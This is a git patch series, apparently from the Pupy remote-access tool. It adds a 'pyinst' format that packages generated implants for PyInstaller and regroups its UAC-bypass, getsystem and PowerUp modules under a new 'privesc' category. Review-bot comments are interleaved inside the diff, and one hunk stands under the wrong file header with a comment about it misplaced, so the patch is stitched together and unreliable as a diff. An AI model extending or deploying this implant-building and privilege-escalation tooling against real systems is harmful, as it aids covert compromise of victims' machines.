From 1028cd23a8fb395c7a782cae1c1a6d6817481b41 Mon Sep 17 00:00:00 2001
From: root
Date: Wed, 27 Jul 2016 09:22:02 -0400
Subject: [PATCH 1/3] New 'pyinst' output format for making a .py which can be used by pyinstaller
---
 pupy/conf/imports_done.py | 75 ++++++++++++++++++++++++++++
 pupy/pupygen.py | 11 ++--
 pupy/pupylib/payloads/py_oneliner.py | 10 +++-
 3 files changed, 90 insertions(+), 6 deletions(-)
 create mode 100644 pupy/conf/imports_done.py
diff --git a/pupy/conf/imports_done.py b/pupy/conf/imports_done.py
new file mode 100644
index 00000000..aac5a2b6
--- /dev/null
+++ b/pupy/conf/imports_done.py
@@ -0,0 +1,75 @@
+from collections import OrderedDict
+from Crypto.Cipher import AES
+from Crypto.Hash import HMAC
+from Crypto.Hash import SHA256
+from Crypto.Hash import SHA256, HMAC
+from Crypto import Random
+from Crypto.Protocol.KDF import PBKDF2
+from Crypto.Util import Counter
+from cStringIO import StringIO
+from itertools import izip, starmap
+from operator import xor
+from StringIO import StringIO
+from struct import Struct
+import argparse
+import base64
+import binascii
+import bz2
+import code
+import collections
+import configparser
+import copy
+import cPickle
+import Crypto.Cipher
+import Crypto.Cipher.AES
+import Crypto.Hash.HMAC
+import Crypto.Hash.SHA256
+import Crypto.Util.Counter
+import datetime
+import errno, stat
+import fractions
+import __future__
+import getpass
+import glob
+import hashlib
+import hmac
+import imp
+import importlib
+import inspect
+import json
+import logging
+import math
+import multiprocessing
+import new
+import os
+import pkgutil
+import platform
+import Queue
+import random
+import re
+import rsa
+import shlex
+import shutil
+import site
+import socket
+import SocketServer
+import ssl
+import string
+import StringIO
+import struct
+import subprocess
+import sys
+import tempfile
+import threading
+import time
+import traceback
+import urllib
+import urllib2
+import uuid
+import yaml
+import zlib
+if os.name == 'nt':
+ import ctypes
+ import ctypes.wintypes
+if os.name == 'posix':
+ import pty
diff --git a/pupy/pupygen.py b/pupy/pupygen.py
index 6d5ce2bd..918973b2 100755
--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
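Review bot: The new file carries no comment saying what it is for, and since its text is written verbatim into generated payloads (pupygen.py in this same patch), a header such as `# Manifest of modules imported so that a packaging tool bundles them; prepended to 'pyinst' payloads` would tell a reader why a bare list of imports exists. Within the list, `import StringIO` near the end rebinds the name `StringIO`, which `from cStringIO import StringIO` and `from StringIO import StringIO` earlier bound to a class, to the module object, so anything following this text in the payload sees the module under that name. `from Crypto.Hash import SHA256, HMAC` repeats the two single-name imports directly above it. `import configparser` is the Python 3 module name, while `cPickle`, `Queue`, `urllib2` and `izip` only exist on Python 2, so the file as written appears not to import cleanly on either interpreter without an extra package; worth confirming which interpreter it is meant to load under.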
@@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf
 from pupylib.utils.network import get_local_ip
 from pupylib.utils.term import colorize
 from pupylib.payloads.python_packer import gen_package_pickled_dic
-from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload
+from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
 from pupylib.utils.obfuscate import compress_encode_obfs
 from network.conf import transports, launchers
 from network.lib.base_launcher import LauncherError
@@ -254,7 +254,7 @@ class ListOptions(argparse.Action):
 print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
 exit()
-PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner']
+PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner']
 if __name__=="__main__":
 if os.path.dirname(__file__):
 os.chdir(os.path.dirname(__file__))
@@ -331,12 +331,15 @@ if __name__=="__main__":
 if not outpath:
 outpath="pupy.apk"
 get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf)
-elif args.format=="py":
+elif args.format=="py" or args.format=="pyinst":
+ linux_modules = ""
 if not outpath:
 outpath="payload.py"
+ if args.format=="pyinst" :
+ linux_modules = getLinuxImportedModules()
 packed_payload=pack_py_payload(get_raw_conf(conf))
 with open(outpath, 'wb') as w:
- w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload)
+ w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
 elif args.format=="py_oneliner":
 packed_payload=pack_py_payload(get_raw_conf(conf))
 i=conf["launcher_args"].index("--host")+1
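Review bot: In the -331 hunk the `w.write(...)` line now joins `linux_modules+"\n"` for both formats, so the plain `py` output gains an extra blank line between the coding header and the payload that it did not have before; keeping the separator inside the `pyinst` branch, `linux_modules = getLinuxImportedModules() + "\n"`, leaves `py` output byte-identical to the old behaviour. The name `linux_modules` is also misleading: the text comes from conf/imports_done.py, which contains an `os.name == 'nt'` branch, so something like `pyinst_imports` would describe it better. `if args.format=="pyinst" :` has a stray space before the colon. The enclosing `if __name__=="__main__":` block starts and ends outside the hunk.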
@@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
+def getLinuxImportedModules():
+ '''
+ '''
+ lines = ""
+ with open(os.path.join(ROOT,"conf","imports_done.py")) as f:
+ lines=f.read()
+ return lines
+
 def pack_py_payload(conf):
 print colorize("[+] ","green")+"generating payload ..."
 fullpayload=[]
@@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip=""):
 print 'KeyboardInterrupt received, shutting down the web server'
 server.socket.close()
 exit()
-
-
From 2fc505ea6a16cfa749ce462a6afb3ca91c529913 Mon Sep 17 00:00:00 2001
From: n1nj4sec
Date: Wed, 27 Jul 2016 18:40:41 +0200
Subject: [PATCH 2/3] adding privesc category
---
 pupy/modules/bypassuac.py | 2 +-
 pupy/modules/getsystem.py | 2 +-
 pupy/modules/powerup.py | 4 ++--
 pupy/pupylib/conf.py | 2 +-
 4 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/pupy/modules/bypassuac.py b/pupy/modules/bypassuac.py
index 3ec5526f..ef3c262c 100644
--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -8,7 +8,7 @@ __class_name__="BypassUAC"
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
-@config(compat="windows", category="exploit")
+@config(compat="windows", category="privesc")
 class BypassUAC(PupyModule):
 """ try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
 dependencies=["psutil", "pupwinutils.processes"]
diff --git a/pupy/modules/getsystem.py b/pupy/modules/getsystem.py
index 260af7f9..65a62a55 100644
--- a/pupy/modules/getsystem.py
+++ b/pupy/modules/getsystem.py
@@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo
 from modules.lib.windows.migrate import migrate
 __class_name__="GetSystem"
-@config(compat="windows", category="exploit")
+@config(compat="windows", category="privesc")
 class GetSystem(PupyModule):
 """ try to get NT AUTHORITY SYSTEM privileges """
 dependencies=["psutil", "pupwinutils.security"]
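Review bot: `getLinuxImportedModules` in the -13 hunk has an empty docstring; it should state what is returned, e.g. `'''Return the text of conf/imports_done.py, which pupygen prepends to "pyinst" payloads.'''`. The initial `lines = ""` is dead: the `with` block always assigns `lines`, and if `open` fails the function raises before reaching `return`, so the body can simply `return f.read()` inside the `with`. The camelCase name differs from the snake_case used by the rest of this module (`pack_py_payload`, `serve_payload`), and "Linux" in the name is not borne out by the file it reads, which carries an `os.name == 'nt'` branch.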
diff --git a/pupy/modules/powerup.py b/pupy/modules/powerup.py
index 7332b680..f81625f6 100644
--- a/pupy/modules/powerup.py
+++ b/pupy/modules/powerup.py
@@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script
 __class_name__="PowerUp"
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
-@config(compat="windows", category="admin")
+@config(compat="windows", category="privesc")
 class PowerUp(PupyModule):
 """ trying common Windows privilege escalation methods"""
@@ -23,4 +23,4 @@ class PowerUp(PupyModule):
 # parse output depending on the PowerUp output
 output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
- self.success("%s" % output)
\ No newline at end of file
+ self.success("%s" % output)
diff --git a/pupy/pupylib/conf.py b/pupy/pupylib/conf.py
index af5e5dfc..1fb55732 100644
--- a/pupy/pupylib/conf.py
+++ b/pupy/pupylib/conf.py
@@ -4,5 +4,5 @@
 # Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
 #authorized categories
-categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"]
+categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"]
From 1a0bd4e2404e125bf6e55605b8264195b6301839 Mon Sep 17 00:00:00 2001
From: n1nj4sec
Date: Wed, 27 Jul 2016 18:44:51 +0200
Subject: [PATCH 3/3] adding help for pyinst new format
---
 pupy/pupygen.py | 1 +
 1 file changed, 1 insertion(+)
diff --git a/pupy/pupygen.py b/pupy/pupygen.py
index 918973b2..ddbc668f 100755
--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -236,6 +236,7 @@ class ListOptions(argparse.Action):
 print "\t- exe_86, exe_x64 : generate PE exe for windows"
 print "\t- dll_86, dll_x64 : generate reflective dll for windows"
 print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
+ print "\t- pyinst : generate a python file compatible with pyinstaller"
 print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line."
 print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."